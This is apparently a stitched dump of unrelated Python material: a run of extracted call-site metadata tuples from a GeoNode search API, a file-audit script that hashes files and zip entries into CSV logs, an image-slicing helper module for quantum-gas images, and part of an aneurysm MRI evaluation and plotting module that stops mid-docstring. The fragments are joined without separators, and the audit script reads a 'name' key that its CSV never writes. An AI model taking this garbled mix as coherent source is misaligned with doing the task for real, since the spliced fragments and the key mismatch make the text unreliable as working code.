'django.utils.translation.gettext', '_', (['obj.category.gn_description'], {}), '(obj.category.gn_description)\n', (28723, 28752), True, 'from django.utils.translation import gettext as _\n'), ((33128, 33162), 'tastypie.http.HttpBadRequest', 'http.HttpBadRequest', ([], {'reason': 'reason'}), '(reason=reason)\n', (33147, 33162), False, 'from tastypie import http\n'), ((33729, 33763), 'tastypie.http.HttpBadRequest', 'http.HttpBadRequest', ([], {'reason': 'reason'}), '(reason=reason)\n', (33748, 33763), False, 'from tastypie import http\n'), ((34109, 34133), 'django.http.HttpResponse', 'HttpResponse', ([], {'status': '(200)'}), '(status=200)\n', (34121, 34133), False, 'from django.http import HttpResponse\n'), ((34410, 34434), 'geonode.layers.models.Layer.objects.distinct', 'Layer.objects.distinct', ([], {}), '()\n', (34432, 34434), False, 'from geonode.layers.models import Layer\n'), ((35814, 35844), 'django.utils.translation.gettext', '_', (['obj.category.gn_description'], {}), '(obj.category.gn_description)\n', (35815, 35844), True, 'from django.utils.translation import gettext as _\n'), ((37180, 37225), 'django.forms.models.model_to_dict', 'model_to_dict', (['layer'], {'fields': 'map_layer_fields'}), '(layer, fields=map_layer_fields)\n', (37193, 37225), False, 'from django.forms.models import model_to_dict\n'), ((38051, 38073), 'geonode.maps.models.Map.objects.distinct', 'Map.objects.distinct', ([], {}), '()\n', (38071, 38073), False, 'from geonode.maps.models import Map\n'), ((39105, 39135), 'django.utils.translation.gettext', '_', (['obj.category.gn_description'], {}), '(obj.category.gn_description)\n', (39106, 39135), True, 'from django.utils.translation import gettext as _\n'), ((40664, 40691), 'geonode.documents.models.Document.objects.distinct', 'Document.objects.distinct', ([], {}), '()\n', (40689, 40691), False, 'from geonode.documents.models import Document\n'), ((9028, 9047), 'django.db.models.Q', 'Q', ([], {'dirty_state': '(True)'}), '(dirty_state=True)\n', (9029, 9047), False, 'from django.db.models import Q\n'), ((10616, 10639), 'django.db.models.Q', 'Q', ([], {'bbox_x0__gte': 'bbox[0]'}), '(bbox_x0__gte=bbox[0])\n', (10617, 10639), False, 'from django.db.models import Q\n'), ((10642, 10665), 'django.db.models.Q', 'Q', ([], {'bbox_x1__lte': 'bbox[2]'}), '(bbox_x1__lte=bbox[2])\n', (10643, 10665), False, 'from django.db.models import Q\n'), ((17275, 17299), 'haystack.query.SQ', 'SQ', ([], {'bbox_right__lte': 'left'}), '(bbox_right__lte=left)\n', (17277, 17299), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((20149, 20191), 'django.http.Http404', 'Http404', (['"""Sorry, no results on that page."""'], {}), "('Sorry, no results on that page.')\n", (20156, 20191), False, 'from django.http import Http404\n'), ((21381, 21415), 're.search', 're.search', (['"""_exact$|_sortable$"""', 'k'], {}), "('_exact$|_sortable$', k)\n", (21390, 21415), False, 'import re\n'), ((28901, 28946), 'geonode.groups.models.GroupProfile.objects.get', 'GroupProfile.objects.get', ([], {'slug': 'obj.group.name'}), '(slug=obj.group.name)\n', (28925, 28946), False, 'from geonode.groups.models import GroupProfile\n'), ((35993, 36038), 'geonode.groups.models.GroupProfile.objects.get', 'GroupProfile.objects.get', ([], {'slug': 'obj.group.name'}), '(slug=obj.group.name)\n', (36017, 36038), False, 'from geonode.groups.models import GroupProfile\n'), ((39284, 39329), 'geonode.groups.models.GroupProfile.objects.get', 'GroupProfile.objects.get', ([], {'slug': 'obj.group.name'}), '(slug=obj.group.name)\n', (39308, 39329), False, 'from geonode.groups.models import GroupProfile\n'), ((8882, 8901), 'django.db.models.Q', 'Q', ([], {'dirty_state': '(True)'}), '(dirty_state=True)\n', (8883, 8901), False, 'from django.db.models import Q\n'), ((10762, 10792), 'geonode.layers.models.Layer.objects.order_by', 'Layer.objects.order_by', (['"""srid"""'], {}), "('srid')\n", (10784, 10792), False, 'from geonode.layers.models import Layer\n'), ((13253, 13269), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13267, 13269), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14002, 14027), 'haystack.query.SQ', 'SQ', ([], {'content__exact': 'phrase'}), '(content__exact=phrase)\n', (14004, 14027), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14121, 14161), 're.split', 're.split', (['"""\\\\W"""', 'query'], {'flags': 're.UNICODE'}), "('\\\\W', query, flags=re.UNICODE)\n", (14129, 14161), False, 'import re\n'), ((15424, 15440), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (15438, 15440), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16476, 16492), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16490, 16492), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16662, 16678), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16676, 16678), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16808, 16824), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16822, 16824), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17064, 17080), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17078, 17080), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17227, 17251), 'haystack.query.SQ', 'SQ', ([], {'bbox_left__gte': 'right'}), '(bbox_left__gte=right)\n', (17229, 17251), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17420, 17436), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17434, 17436), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((26163, 26206), 'geonode.base.models.ResourceBase.objects.polymorphic_queryset', 'ResourceBase.objects.polymorphic_queryset', ([], {}), '()\n', (26204, 26206), False, 'from geonode.base.models import ResourceBase\n'), ((10041, 10064), 'django.db.models.Q', 'Q', ([], {'name__iexact': 'keyword'}), '(name__iexact=keyword)\n', (10042, 10064), False, 'from django.db.models import Q\n'), ((10067, 10090), 'django.db.models.Q', 'Q', ([], {'slug__iexact': 'keyword'}), '(slug__iexact=keyword)\n', (10068, 10090), False, 'from django.db.models import Q\n'), ((10169, 10201), 'geonode.base.models.HierarchicalKeyword.get_tree', 'HierarchicalKeyword.get_tree', (['kw'], {}), '(kw)\n', (10197, 10201), False, 'from geonode.base.models import HierarchicalKeyword\n'), ((11220, 11248), 'django.db.models.Q', 'Q', ([], {'bbox_y1__lte': 'proj_bbox[3]'}), '(bbox_y1__lte=proj_bbox[3])\n', (11221, 11248), False, 'from django.db.models import Q\n'), ((13375, 13391), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13389, 13391), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((13834, 13850), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13848, 13850), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((13904, 13927), 'haystack.query.SQ', 'SQ', ([], {'title__exact': 'phrase'}), '(title__exact=phrase)\n', (13906, 13927), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((13950, 13979), 'haystack.query.SQ', 'SQ', ([], {'description__exact': 'phrase'}), '(description__exact=phrase)\n', (13952, 13979), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((15867, 15883), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (15881, 15883), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16293, 16309), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16307, 16309), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17131, 17155), 'haystack.query.SQ', 'SQ', ([], {'bbox_top__lte': 'bottom'}), '(bbox_top__lte=bottom)\n', (17133, 17155), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17179, 17203), 'haystack.query.SQ', 'SQ', ([], {'bbox_bottom__gte': 'top'}), '(bbox_bottom__gte=top)\n', (17181, 17203), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17553, 17569), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17567, 17569), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((25830, 25846), 'tastypie.utils.trailing_slash', 'trailing_slash', ([], {}), '()\n', (25844, 25846), False, 'from tastypie.utils import trailing_slash\n'), ((11164, 11192), 'django.db.models.Q', 'Q', ([], {'bbox_y0__gte': 'proj_bbox[1]'}), '(bbox_y0__gte=proj_bbox[1])\n', (11165, 11192), False, 'from django.db.models import Q\n'), ((17669, 17685), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17683, 17685), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((11102, 11130), 'django.db.models.Q', 'Q', ([], {'bbox_x0__gte': 'proj_bbox[0]'}), '(bbox_x0__gte=proj_bbox[0])\n', (11103, 11130), False, 'from django.db.models import Q\n'), ((11133, 11161), 'django.db.models.Q', 'Q', ([], {'bbox_x1__lte': 'proj_bbox[2]'}), '(bbox_x1__lte=proj_bbox[2])\n', (11134, 11161), False, 'from django.db.models import Q\n'), ((14359, 14375), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (14373, 14375), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17813, 17829), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17827, 17829), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14599, 14615), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14602, 14615), False, 'from haystack.inputs import Raw\n'), ((17966, 17982), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17980, 17982), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((18102, 18118), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (18116, 18118), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14477, 14493), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14480, 14493), False, 'from haystack.inputs import Raw\n'), ((14540, 14556), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14543, 14556), False, 'from haystack.inputs import Raw\n'), ((15008, 15024), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15011, 15024), False, 'from haystack.inputs import Raw\n'), ((15310, 15326), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15313, 15326), False, 'from haystack.inputs import Raw\n'), ((14886, 14902), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14889, 14902), False, 'from haystack.inputs import Raw\n'), ((14949, 14965), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14952, 14965), False, 'from haystack.inputs import Raw\n'), ((15188, 15204), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15191, 15204), False, 'from haystack.inputs import Raw\n'), ((15251, 15267), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15254, 15267), False, 'from haystack.inputs import Raw\n')]
|
#!/usr/bin/env python2
from __future__ import print_function
import csv
import datetime
import errno
import hashlib
import os
import sys
import traceback
import zipfile
AUDIT_CSV_PATH = "audit.csv"
AUDIT_ZIPFILES_CSV_PATH = "audit_with_zipfile_entries.csv"
AUDIT_CSV_FIELDNAMES = ["path", "size", "last_modified_time", "sha256"]
AUDIT_ZIPFILES_CSV_FIELDNAMES = ["path", "entry_filename", "size", "sha256"]
def get_size_and_sha256(infile):
"""
Returns the size and SHA256 checksum (as hex) of the given file.
"""
h = hashlib.sha256()
size = 0
while True:
chunk = infile.read(8192)
if not chunk:
break
h.update(chunk)
size += len(chunk)
return (size, h.hexdigest())
def get_file_paths_under(root):
"""Generates the paths to every file under ``root``."""
if not os.path.isdir(root):
raise ValueError("Cannot find files under non-existent directory: %r" % root)
for dirpath, _, filenames in os.walk(root):
for f in filenames:
if os.path.isfile(os.path.join(dirpath, f)):
yield os.path.join(dirpath, f)
def get_existing_audit_entries():
"""
Returns a list of all the entries already saved in ``AUDIT_CSV_PATH``.
"""
try:
with open(AUDIT_CSV_PATH) as infile:
return list(csv.DictReader(infile))
except IOError as err:
if err.errno == errno.ENOENT:
with open(AUDIT_CSV_PATH, "w") as outfile:
writer = csv.DictWriter(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)
writer.writeheader()
return []
else:
raise
def get_existing_audit_zip_entries(path):
"""
Returns a list of all the entries already saved in ``AUDIT_ZIPFILES_CSV_PATH``
that match ``path``.
"""
try:
with open(AUDIT_ZIPFILES_CSV_PATH) as infile:
return [entry for entry in csv.DictReader(infile) if entry["path"] == path]
except IOError as err:
if err.errno == errno.ENOENT:
with open(AUDIT_ZIPFILES_CSV_PATH, "w") as outfile:
writer = csv.DictWriter(
outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES
)
writer.writeheader()
return []
else:
raise
def get_paths_to_audit(root):
"""
Generates a list of paths that should be audited.
"""
existing_audit_paths = {e["path"] for e in get_existing_audit_entries()}
for path in get_file_paths_under(root):
# These files are of no consequence. We can ignore them.
if os.path.basename(path) in {".DS_Store", "Thumbs.db"}:
continue
if path in existing_audit_paths:
continue
yield path
def record_audit_for_zipfile_entries(path):
"""
Record audit information for all the entries in a zipfile.
"""
assert path.endswith(".zip")
existing_zip_entry_names = {e["name"] for e in get_existing_audit_zip_entries(path)}
with open(AUDIT_ZIPFILES_CSV_PATH, "a") as outfile:
writer = csv.DictWriter(outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES)
with zipfile.ZipFile(path) as zf:
for info in zf.infolist():
if info.filename in existing_zip_entry_names:
continue
with zf.open(info) as entry:
size, sha256 = get_size_and_sha256(entry)
writer.writerow(
{
"path": path,
"entry_filename": info.filename,
"size": size,
"sha256": sha256,
}
)
def record_audit_for_path(path):
"""
Record audit information for a single file.
"""
with open(AUDIT_CSV_PATH, "a") as outfile:
writer = csv.DictWriter(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)
stat = os.stat(path)
with open(path, "rb") as infile:
size, sha256 = get_size_and_sha256(infile)
mtime = os.stat(path).st_mtime
last_modified_time = datetime.datetime.fromtimestamp(mtime).isoformat()
writer.writerow(
{
"path": path,
"size": size,
"last_modified_time": last_modified_time,
"sha256": sha256,
}
)
if __name__ == "__main__":
try:
root = sys.argv[1]
except IndexError:
sys.exit("Usage: %s <ROOT>" % __file__)
for path in get_paths_to_audit(root=root):
print(path)
try:
if path.endswith(".zip"):
record_audit_for_zipfile_entries(path)
record_audit_for_path(path)
except Exception as exc:
with open("exceptions.log", "a") as outfile:
outfile.write("Exception while trying to audit %r:\n\n" % path)
traceback.print_exc(file=outfile)
outfile.write("\n---\n\n")
|
[
"traceback.print_exc",
"zipfile.ZipFile",
"os.stat",
"os.path.basename",
"os.path.isdir",
"csv.DictReader",
"os.walk",
"hashlib.sha256",
"datetime.datetime.fromtimestamp",
"os.path.join",
"sys.exit",
"csv.DictWriter"
] |
[((539, 555), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (553, 555), False, 'import hashlib\n'), ((991, 1004), 'os.walk', 'os.walk', (['root'], {}), '(root)\n', (998, 1004), False, 'import os\n'), ((850, 869), 'os.path.isdir', 'os.path.isdir', (['root'], {}), '(root)\n', (863, 869), False, 'import os\n'), ((3118, 3183), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_ZIPFILES_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES)\n', (3132, 3183), False, 'import csv\n'), ((3899, 3955), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)\n', (3913, 3955), False, 'import csv\n'), ((3972, 3985), 'os.stat', 'os.stat', (['path'], {}), '(path)\n', (3979, 3985), False, 'import os\n'), ((2638, 2660), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (2654, 2660), False, 'import os\n'), ((3198, 3219), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (3213, 3219), False, 'import zipfile\n'), ((4100, 4113), 'os.stat', 'os.stat', (['path'], {}), '(path)\n', (4107, 4113), False, 'import os\n'), ((4515, 4554), 'sys.exit', 'sys.exit', (["('Usage: %s <ROOT>' % __file__)"], {}), "('Usage: %s <ROOT>' % __file__)\n", (4523, 4554), False, 'import sys\n'), ((1064, 1088), 'os.path.join', 'os.path.join', (['dirpath', 'f'], {}), '(dirpath, f)\n', (1076, 1088), False, 'import os\n'), ((1343, 1365), 'csv.DictReader', 'csv.DictReader', (['infile'], {}), '(infile)\n', (1357, 1365), False, 'import csv\n'), ((4152, 4190), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['mtime'], {}), '(mtime)\n', (4183, 4190), False, 'import datetime\n'), ((1113, 1137), 'os.path.join', 'os.path.join', (['dirpath', 'f'], {}), '(dirpath, f)\n', (1125, 1137), False, 'import os\n'), ((1512, 1568), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)\n', (1526, 1568), False, 'import csv\n'), ((1934, 1956), 'csv.DictReader', 'csv.DictReader', (['infile'], {}), '(infile)\n', (1948, 1956), False, 'import csv\n'), ((2137, 2202), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_ZIPFILES_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES)\n', (2151, 2202), False, 'import csv\n'), ((4956, 4989), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'outfile'}), '(file=outfile)\n', (4975, 4989), False, 'import traceback\n')]
|
"""
Created on Mon Sep 9 15:51:35 2013
QgasUtils: Basic Quantum Gas Utilities functions
@author: ispielman
Modified on Wed Dec 10 11:26: 2014
@author: aputra
"""
import numpy
import scipy.ndimage
def ImageSlice(xVals, yVals, Image, r0, Width, Scaled = False):
"""
Produces a pair of slices from image of a band with 'Width' centered at r0 = [x y]
Scaled : 'False' use pixels directly, and 'True' compute scaling from (xvals and yvals) assuming
they are linearly spaced
Currently Width and x,y are in scaled units, not pixel units.
the return will be ((xvals xslice) (yvals yslice)), where each entry is a numpy array.
these are copies, not views.
"""
if (Scaled):
(xMin, yMin) = numpy.floor(GetPixelCoordsFromImage(r0, - Width/2, xVals, yVals));
(xMax, yMax) = numpy.ceil(GetPixelCoordsFromImage(r0, Width/2, xVals, yVals));
else:
(xMin, yMin) = r0 - numpy.round(Width/2);
(xMax, yMax) = r0 + numpy.round(Width/2);
# Extract bands of desired width
# These are slices, so views of the initial data
if xMin<0: xMin =0
if yMin<0: yMin =0
if xMax>xVals.shape[1]: xMax = xVals.shape[1]
if yMax>yVals.shape[0]: yMax = yVals.shape[0]
# Compute averages
ySlice = Image[:,xMin:xMax].mean(1); # along y, so use x center
xSlice = Image[yMin:yMax,:].mean(0); # along x, so use y center
yValsSlice = yVals[:,0].copy();
xValsSlice = xVals[0,:].copy();
return ((xValsSlice, xSlice), (yValsSlice, ySlice));
def ImageCrop(xVals, yVals, Image, r0, Width, Scaled = False, Center = True):
"""
crops an image along with the associated matrix of x and y
to a specified area and returns the cropped image
this will be a copy not a view
Image, xVals, yVals : (2D image, xvals, yvals)
r0 : center of ROI in physical units (two element list or array)
Width : length of box-sides in physical units (two element list or array)
Scaled : If true, will attempt to use the x and y waves, to generate pixel values
Center : Recenter on cropped region
"""
error = False;
Cropped_Image={'OptDepth':0,'xVals':0,'yVals':0,'Error':error}
if (Scaled):
if(ScaleTest(xVals, yVals)):
rMinPixel = numpy.floor(GetPixelCoordsFromImage(r0, -Width/2, xVals, yVals));
rMaxPixel = numpy.ceil(GetPixelCoordsFromImage(r0, Width/2, xVals, yVals));
else:
rMinPixel = numpy.floor(r0)-numpy.floor(Width/2);
rMaxPixel = numpy.ceil(r0)+numpy.ceil(Width/2);
error = True;
else:
rMinPixel = numpy.floor(r0)-numpy.floor(Width/2);
rMaxPixel = numpy.ceil(r0)+numpy.ceil(Width/2);
if rMinPixel[0]<0: rMinPixel[0]=0
if rMinPixel[1]<0: rMinPixel[1]=0
if rMaxPixel[0]>xVals.shape[1]: rMaxPixel[0] = xVals.shape[1]
if rMaxPixel[1]>yVals.shape[0]: rMaxPixel[1] = yVals.shape[0]
Cropped_Image['OptDepth'] = Image[rMinPixel[1]:rMaxPixel[1],rMinPixel[0]:rMaxPixel[0]].copy();
Cropped_Image['xVals'] = xVals[rMinPixel[1]:rMaxPixel[1],rMinPixel[0]:rMaxPixel[0]].copy();
Cropped_Image['yVals'] = yVals[rMinPixel[1]:rMaxPixel[1],rMinPixel[0]:rMaxPixel[0]].copy();
if (Center):
Cropped_Image['xVals'] -= r0[0];
Cropped_Image['yVals'] -= r0[1];
return Cropped_Image;
def ImageSliceFromMax(Image, width, pScale = True):
"""
Produces a pair of slices from image of a band with 'Width' centered at the maximum val of Image
Scaled : 'False' use pixels directly, and 'True' compute scaling from (xvals and yvals) assuming
they are linearly spaced
Currently Width and x,y are in scaled units, not pixel units.
the return will be ((xvals xslice) (yvals yslice)), where each entry is a numpy array.
these are copies, not views.
"""
Z = scipy.ndimage.gaussian_filter(Image['OptDepth'], sigma=3);
id = Z.argmax()
r0max = (numpy.ravel(Image['xVals'])[id], numpy.ravel(Image['yVals'])[id])
imgSlice = ImageSlice(Image['xVals'], Image['yVals'], Image['OptDepth'], r0max, width, Scaled = pScale)
imgSlicefromMax={'xVals':0,'yVals':0,'xSlice':0, 'ySlice':0, 'xMax':r0max[0], 'yMax':r0max[1]}
imgSlicefromMax['yVals'] = imgSlice[1][0]
imgSlicefromMax['xVals'] = imgSlice[0][0]
imgSlicefromMax['ySlice'] = imgSlice[1][1]
imgSlicefromMax['xSlice'] = imgSlice[0][1]
return imgSlicefromMax
def GetPixelCoordsFromImage(r0, Offset, xVals, yVals):
"""
Returns the pixel coordinates associated with the scaled values in the 2D arrays xVals and yVals
remember in r0 the ordering is r0 = (x0, y0)
"""
# Assume that the correct arrays were passed
dy = yVals[1][0] - yVals[0][0];
dx = xVals[0][1] - xVals[0][0];
y0 = yVals[0][0];
x0 = xVals[0][0];
#want offset to be an integer number of pixels
Offset = numpy.round(Offset/numpy.array([dx,dy]));
return (r0 - numpy.array([x0, y0])) /numpy.array([dx, dy])+Offset;
def ScaleTest(xVals, yVals):
"""
Returns the pixel coordinates associated with the scaled values in the 2D arrays xVals and yVals
remember in r0 the ordering is r0 = (x0, y0)
"""
# Assume that the correct arrays were passed
dy = yVals[1][0] - yVals[0][0];
dx = xVals[0][1] - xVals[0][0];
if ((dx == 0) or (dy == 0)):
print("ImageSlice: generating scaled axes failed");
print(dx,dy,xVals[0][1],xVals[0][0],yVals[1][0],yVals[0][0],xVals,yVals)
return False;
else:
return True;
|
[
"numpy.ceil",
"numpy.ravel",
"numpy.floor",
"numpy.array",
"numpy.round"
] |
[((936, 958), 'numpy.round', 'numpy.round', (['(Width / 2)'], {}), '(Width / 2)\n', (947, 958), False, 'import numpy\n'), ((986, 1008), 'numpy.round', 'numpy.round', (['(Width / 2)'], {}), '(Width / 2)\n', (997, 1008), False, 'import numpy\n'), ((2672, 2687), 'numpy.floor', 'numpy.floor', (['r0'], {}), '(r0)\n', (2683, 2687), False, 'import numpy\n'), ((2688, 2710), 'numpy.floor', 'numpy.floor', (['(Width / 2)'], {}), '(Width / 2)\n', (2699, 2710), False, 'import numpy\n'), ((2730, 2744), 'numpy.ceil', 'numpy.ceil', (['r0'], {}), '(r0)\n', (2740, 2744), False, 'import numpy\n'), ((2745, 2766), 'numpy.ceil', 'numpy.ceil', (['(Width / 2)'], {}), '(Width / 2)\n', (2755, 2766), False, 'import numpy\n'), ((4000, 4027), 'numpy.ravel', 'numpy.ravel', (["Image['xVals']"], {}), "(Image['xVals'])\n", (4011, 4027), False, 'import numpy\n'), ((4033, 4060), 'numpy.ravel', 'numpy.ravel', (["Image['yVals']"], {}), "(Image['yVals'])\n", (4044, 4060), False, 'import numpy\n'), ((4958, 4979), 'numpy.array', 'numpy.array', (['[dx, dy]'], {}), '([dx, dy])\n', (4969, 4979), False, 'import numpy\n'), ((5025, 5046), 'numpy.array', 'numpy.array', (['[dx, dy]'], {}), '([dx, dy])\n', (5036, 5046), False, 'import numpy\n'), ((2518, 2533), 'numpy.floor', 'numpy.floor', (['r0'], {}), '(r0)\n', (2529, 2533), False, 'import numpy\n'), ((2534, 2556), 'numpy.floor', 'numpy.floor', (['(Width / 2)'], {}), '(Width / 2)\n', (2545, 2556), False, 'import numpy\n'), ((2580, 2594), 'numpy.ceil', 'numpy.ceil', (['r0'], {}), '(r0)\n', (2590, 2594), False, 'import numpy\n'), ((2595, 2616), 'numpy.ceil', 'numpy.ceil', (['(Width / 2)'], {}), '(Width / 2)\n', (2605, 2616), False, 'import numpy\n'), ((5001, 5022), 'numpy.array', 'numpy.array', (['[x0, y0]'], {}), '([x0, y0])\n', (5012, 5022), False, 'import numpy\n')]
|
import os
import json
import multiprocessing
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import matplotlib as mpl
import pandas as pd
import matplotlib.animation
from sklearn.model_selection import train_test_split
from tqdm import tqdm
from typing import List
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from scipy.spatial import distance_matrix
import nibabel as nib
from scipy.ndimage.interpolation import zoom
from scipy import ndimage
from sklearn.metrics import jaccard_score
from skimage.metrics import hausdorff_distance
from scipy.stats import pearsonr
from aneurysm_utils.preprocessing import resize_mri
from aneurysm_utils.environment import Environment
from collections import defaultdict
from sklearn import metrics as sk_metrics
from sklearn.preprocessing import MinMaxScaler
#import open3d
def evaluate_model(
y_true: list, y_pred: list, segmentation: bool = None, prefix: str = None
) -> dict:
metrics = {}
if segmentation:
y_true = np.concatenate(y_true).ravel()
y_pred = np.concatenate(y_pred).ravel()
if not prefix:
prefix = ""
else:
prefix = prefix + "_"
metrics[prefix + "accuracy"] = sk_metrics.accuracy_score(y_true, y_pred)
metrics[prefix + "bal_acc"] = sk_metrics.balanced_accuracy_score(y_true, y_pred)
try:
metrics[prefix + "precision"] = sk_metrics.precision_score(y_true, y_pred)
metrics[prefix + "recall"] = sk_metrics.recall_score(y_true, y_pred)
metrics[prefix + "spec"] = sk_metrics.recall_score(y_true, y_pred, pos_label=0)
metrics[prefix + "sen"] = sk_metrics.recall_score(y_true, y_pred, pos_label=1)
metrics[prefix + "f1"] = sk_metrics.f1_score(y_true, y_pred)
except Exception:
print(
"precision/recall/spec/sen/f1 are not supported for non-binary classification."
)
print("Accuracy (" + prefix + "): " + str(metrics[prefix + "accuracy"]))
print("Balanced Accuracy (" + prefix + "): " + str(metrics[prefix + "bal_acc"]))
print(sk_metrics.classification_report(y_true, y_pred))
return metrics
# Transparent colormap (alpha to red), that is used for plotting an overlay.
# See https://stackoverflow.com/questions/37327308/add-alpha-to-an-existing-matplotlib-colormap
alpha_to_red_cmap = np.zeros((256, 4))
alpha_to_red_cmap[:, 0] = 0.8
alpha_to_red_cmap[:, -1] = np.linspace(0, 1, 256) # cmap.N-20) # alpha values
alpha_to_red_cmap = mpl.colors.ListedColormap(alpha_to_red_cmap)
red_to_alpha_cmap = np.zeros((256, 4))
red_to_alpha_cmap[:, 0] = 0.8
red_to_alpha_cmap[:, -1] = np.linspace(1, 0, 256) # cmap.N-20) # alpha values
red_to_alpha_cmap = mpl.colors.ListedColormap(red_to_alpha_cmap)
def animate_slices(
struct_arr,
overlay=None,
axis=0,
reverse_direction=False,
interval=40,
vmin=None,
vmax=None,
overlay_vmin=None,
overlay_vmax=None,
):
"""
Create a matplotlib animation that moves through a 3D image along a specified axis.
"""
if vmin is None:
vmin = struct_arr.min()
if vmax is None:
vmax = struct_arr.max()
if overlay_vmin is None and overlay is not None:
overlay_vmin = overlay.min()
if overlay_vmax is None and overlay is not None:
overlay_vmax = overlay.max()
fig, ax = plt.subplots()
axis_label = ["x", "y", "z"][axis]
# TODO: If I select slice 50 here at the beginning, the plots look different.
im = ax.imshow(
np.take(struct_arr, 0, axis=axis),
vmin=vmin,
vmax=vmax,
cmap="gray",
interpolation=None,
animated=True,
)
if overlay is not None:
im_overlay = ax.imshow(
np.take(overlay, 0, axis=axis),
vmin=overlay_vmin,
vmax=overlay_vmax,
cmap=alpha_to_red_cmap,
interpolation=None,
animated=True,
)
text = ax.text(
0.03,
0.97,
"{}={}".format(axis_label, 0),
color="white",
horizontalalignment="left",
verticalalignment="top",
transform=ax.transAxes,
)
ax.axis("off")
def update(i):
im.set_array(np.take(struct_arr, i, axis=axis))
if overlay is not None:
im_overlay.set_array(np.take(overlay, i, axis=axis))
text.set_text("{}={}".format(axis_label, i))
return im, text
num_frames = struct_arr.shape[axis]
if reverse_direction:
frames = np.arange(num_frames - 1, 0, -1)
else:
frames = np.arange(0, num_frames)
return mpl.animation.FuncAnimation(
fig, update, frames=frames, interval=interval, blit=True
)
def plot_slices(
struct_arr,
num_slices=7,
cmap="gray",
vmin=None,
vmax=None,
overlay=None,
overlay_cmap=alpha_to_red_cmap,
overlay_vmin=None,
overlay_vmax=None,
):
"""
Plot equally spaced slices of a 3D image (and an overlay) along every axis
Args:
struct_arr (3D array or tensor): The 3D array to plot (usually from a nifti file).
num_slices (int): The number of slices to plot for each dimension.
cmap: The colormap for the image (default: `'gray'`).
vmin (float): Same as in matplotlib.imshow. If `None`, take the global minimum of `struct_arr`.
